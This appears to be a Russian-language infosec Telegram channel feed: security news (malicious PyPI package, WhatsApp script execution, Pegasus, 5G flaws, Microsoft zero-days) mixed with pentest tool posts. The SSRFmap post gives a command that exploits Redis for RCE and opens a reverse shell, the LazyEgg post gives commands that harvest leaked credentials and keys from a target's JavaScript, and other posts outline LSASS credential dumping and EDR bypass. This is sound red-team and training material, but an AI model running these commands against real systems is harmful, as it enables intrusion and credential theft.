📱 Кто стучится в почту? Social engineering 2024

PDF или SVG smuggling, PDF polyglot, PDF luring в докладе Константина Полишина об актуальных методах проведения фишинга в рамках Red team проектов являются дополнением к материалам PHD12.

С первой частью составного доклада по этой теме можно ознакомиться по следующей ссылке. В прошлогоднем выпуске PT также расписан материал первой части.

Приятного просмотра🌟

🎙 До начала торжественной церемонии остаётся 9 часов

Именно сегодня, в 19:00 ⚡️ , стартует трансляция награждения участников премии Pentest Award.

В этом году лаборатория инновационных технологий и кибербезопасности компании AP Security принимала участие в нескольких номинациях.

Данное мероприятие является праздником для энтузиастов информационной безопасности и позволяет раскрыть в себе творческий и профессиональный потенциал, оценить свои силы, познакомиться с единомышленниками и вдохновиться на что-то новое и интересное.

Мы также в онлайне будем радоваться успехам всех финалистов данной премии и поздравлять своих коллег с попадаем на торжественную церемонию.

🐦 Всем желаем интересных проектов, вдохновения и удачи во всём, к чему лежит душа и делает мир кибербезопаности более насыщенным и интересным!

#infosec

🐶 Новый PyPI-пакет Zlibxjson крадет данные Discord и браузеров

Вредоносный пакет под названием zlibxjson версии 8.2 был отмечен системой обнаружения вредоносного ПО, управляемой искусственным интеллектом компании Fortinet.

Было замечено, что пакет тайно загружает несколько файлов, включая исполняемый файл (.exe) с пакетом PyInstaller, который при распаковке содержит несколько файлов Python и DLL.

Среди них особенно опасными оказались три Python-скрипта - Discord_token_grabber.py, get_cookies.py и password_grabber.py.


📱 Windows-версия WhatsApp позволяет запускать Python и PHP без предупреждения

Проблема в безопасности последней версии WhatsApp (принадлежит компании Meta, признанной экстремистской и запрещенной в России) для Windows позволяет отправлять Python- и PHP-вложения, которые будут выполняться на устройстве пользователя без каких-либо предупреждений.

Для успешной эксплуатации этого бага в системе жертвы должен быть установлен Python. Это условие может сузить список потенциальных жертв до разработчиков софта.

🔔 Власти Израиля изъяли документы и компьютеры у создателей шпионской программы Pegasus, чтобы они не попали в США

Утечка из Министерства юстиции Израиля указывает на то, что правительство страны изъяло документы и компьютеры у компании NSO Group, чтобы предотвратить передачу потенциально компрометирующих материалов в рамках судебного процесса в США. Об этом в конце июля 2024 г. сообщило The Guardian.

По информации The Guardian, ставки запредельно высоки, поскольку судебное разбирательство может раскрыть исключительно секретную информацию, касающуюся шпионского программного обеспечения (ПО) под названием Pegasus, одного из самых известных хакерских инструментов в мире.

Автоматизация с помощью SSRFmap 👁‍🗨

Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения

☄️ https://github.com/swisskyrepo/SSRFmap ☄️

Ставим на хост

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py

Поднимаем докер

git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS] 
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py

Пример команды, где опция -r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модули

python ssrfmap.py -r request.txt -p url -m readfiles,portscan

Используем модуль redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shell

python ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

И в конце небольшой Cheat Sheet по SSRF 💫

#osint

🔍 Telegram-OSINT

Отдельный репозиторий для поиска информации в Telegram, содержащий огромное количество ресурсов.

⚡️Начинающим специалистам стоит не забывать про OPSEC при работе с ботами, требующими номер и собирающими информацию о Вашем аккаунте.

#tools #pentest

📎 PoC CVE-2024-21338

Уязвимость CVE-2024-21338 была обнаружена специалистами Avast в драйвере appid.sys Windows AppLocker, о чем они сообщили Microsoft в августе прошлого года, предупредив, что уязвимость уже активно эксплуатируют злоумышленники.

🟡Подробнее об этой уязвимости написано в статье на Хакер.

#forensics

📡 Kdrill

Инструмент на Python для проверки руткитов в ядре Windows.

Kdrill получает доступ к физической памяти и декодирует внутренние структуры ОС, чтобы исследовать их и проверить целостность.

#infosec

🌟Руководство OpenAI разделилось во мнениях относительно собственной технологии водяного знака ИИ

У OpenAI есть инструмент для автоматического нанесения водяных знаков на контент, созданный искусственным интеллектом, но руководство компании разделилось во мнении, стоит ли выпускать его в открытый доступ.

Инструмент якобы готов к выпуску, но проект уже два года находится во внутренней дискуссии.

Опрос, проведенный компанией в апреле 2023 года среди постоянных пользователей ChatGPT, показал, что почти треть из них отказались бы от этой технологии, главным образом потому, что она может обнаружить списывание и плагиат.

⚡️Уязвимости 5G позволяют следить за владельцами мобильных устройств

Исследователи из Университета Пенсильвании на конференции Black Hat, которая проходит в Лас-Вегасе, продемонстрировали метод слежки за владельцами мобильных устройств с помощью baseband-брешей в 5G.

Используя кастомный инструмент 5GBaseChecker, специалисты выявили уязвимости в базовой полосе, которые применяют 5G-модемы таких производителей, как Samsung, MediaTek и Qualcomm (используются в телефонах Google, OPPO, OnePlus, Motorola и Samsung).

💰 Атака напрокат: в даркнете стоимость готовых ботнетов для массовых атак начинается от 99 долларов США

Эксперты Kaspersky Digital Footprint Intelligence проанализировали объявления о предоставлении услуг, связанных с эксплуатацией ботнетов в даркнете и специализированных Telegram-каналах.

Для создания ботнетов могут использоваться уязвимые пользовательские и корпоративные гаджеты, например со слабыми паролями: от умных камер до продвинутых промышленных устройств. Аналитики «Лаборатории Касперского» в первом полугодии 2024 года зафиксировали рост более чем в два раза числа заражённых IoT-устройств в Росcии по сравнению с аналогичным периодом в прошлом году.

Такие инструменты могут обладать индивидуальными настройками и различаться по способам заражения, типу используемого вредоносного ПО, инфраструктуре, методам обхода обнаружения. Их разрабатывают для продажи на теневом рынке, а стоимость зависит от качества. В объявлениях за 2024 год, которые проанализировали эксперты, самая низкая цена составила 99 долларов США, а самая высокая — 10 тысяч долларов США. Ботнеты также можно взять в аренду: стоимость такой услуги варьируется от 30 до 4 800 долларов США в месяц.

🔠🔠 🔠🔠🔠🔠🔠

Недавно на github'е наткнулся на интересную утилиту LazyEgg, позволяющую добывать ссылки, фото, URL'ы, айпишники, креды, ключи по целевому URL, а также искать и анализировать js файлы по сигнатурам
https://github.com/schooldropout1337/lazyegg

▶️ Установить утилиту

git clone https://github.com/schooldropout1337/lazyegg.git

▶️ Обычный скан по целевому URL

python lazyegg.py https://localhost:8080

▶️ Для поиска скрытых js файлов, можем воспользоваться следующей командой

python lazyegg.py https://localhost:8080/js --js_scan --w wordlist.txt

▶️ LazyEgg позволяет сканить и отдельные js файлы на наличие сигнатур, для этого нужно создать дополнительный файл с URL' ами js файлов

cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'

▶️ Можно воспользоваться скриптом, использующий вывод утилиты waybackurls для дальнейшего скана

waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -u

▶️ Также LazyEgg имеет свое расширение для Chrome, чтобы его поставить, которое находится в архиве le-jsurl.zip репозитория

#tools #pentest

🪆 TrickDump ( lsass dump)

TrickDump генерирует дамп процесса lsass без создания файла Minidump, вместо этого генерируя 3 JSON и 1 ZIP файл с дампами областей памяти. В три шага:

🟥Получение информации об ОС с помощью RtlGetVersion.

🟥Получение привилегии SeDebugPrivilege с помощью NtOpenProcessToken и NtAdjustPrivilegeToken, открытие хэндла с помощью NtGetNextProcess и NtQueryInformationProcess, а затем получение информации о модулях с помощью NtQueryInformationProcess и NtReadVirtualMemory.

🟥Получение привилегии SeDebugPrivilege, открытие хэндла, а затем сбор информации и дампа областей памяти с помощью функций NtQueryVirtualMemory и NtReadVirtualMemory.

Узнать о других подходах и нюансах работы с процессом lsaas можно в следующей статье.

#soc

⚡️Реагирование на инциденты

Короткий мануал с этапами реагирования на инциденты с наглядным разбором практических кейсов по ним.

Приятного прочтения📔

#infosec

⬇️ Microsoft закрыла 9 zero-days в обновлении прошедшего вторника.

Шесть из 9 уязвимостей использовались в дикой природе.

Среди них - ошибка обхода функции безопасности Windows Mark of the Web (MotW) (CVE-2024-38213), которая аналогична обходу SmartScreen, опубликованному в феврале.

«Злоумышленник, убедивший пользователя открыть вредоносный файл, может обойти SmartScreen, который обычно предупреждает пользователя о загруженных из Интернета файлах, которые Windows в противном случае пометила бы MotW», - пояснил ведущий инженер-программист Rapid7 Адам Барнетт (Adam Barnett).

👋Miro заявила о прекращении работы аккаунтов из России и Республики Беларусь 12 сентября

В ответ на запрос пользовательницы сервиса в техподдержке ответили, что пользователи из РФ и РБ смогут пользоваться досками, если их аккаунт зарегистрирован в других странах.

🌟 В российских ИТ-компаниях взрывной спрос на программистов со знанием китайского языка

За семь месяцев число вакансий с таким критерием на рекрутинговых сайтах год к году выросло на 31–65%, преимущественно ищут программистов. По мнению экспертов, это связано с появлением ряда азиатских приложений на российском рынке, а также переходом на китайское оборудование для производства электроники. ИТ-компании также отмечают спрос на ИТ-специалистов и c корейским языком.

#pentest

🔶 Дамп LSASS

В этом коротком видео автор с помощью утилиты на Go приводит пример возможного обхода EDR и последующего дампа LSASS.